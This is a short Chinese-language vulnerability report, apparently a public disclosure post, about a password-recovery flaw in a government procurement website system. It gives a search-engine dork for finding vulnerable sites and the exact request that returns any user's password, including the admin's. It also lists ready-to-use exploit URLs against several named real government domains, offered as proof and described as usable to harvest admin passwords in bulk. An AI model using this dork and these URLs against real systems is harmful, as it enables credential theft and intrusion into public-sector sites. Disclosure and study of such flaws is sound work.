本采购系统用户密码找回处设计缺陷导致的奇葩漏洞
对于采购/招投标网来说,获取管理员信息是不是可以泄露很多信息呢?!
百度搜索 inurl:IndexViewController.do?method=index
通过【找回密码】功能,可泄露任意用户包括密码在内的相关信息。
步骤如下:
(1)找回密码 http://xxx.gov.cn/UserSecurityController.do?method=getPassword&step=1

(2)提交时抓包,可得到链接 http://xxx.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin ,且返回的数据里包含着包括用户密码在内的相关信息

(3)最终可以得知,通过步骤2得到的链接,批量获取管理员密码。
漏洞证明:
http://www.lazfcg.gov.cn/huoshan/UserSecurityController.do?method=getPassword&step=2&userName=admin



http://www.hszgj.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin

http://kszfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin



这里就不一一截图,直接给出链接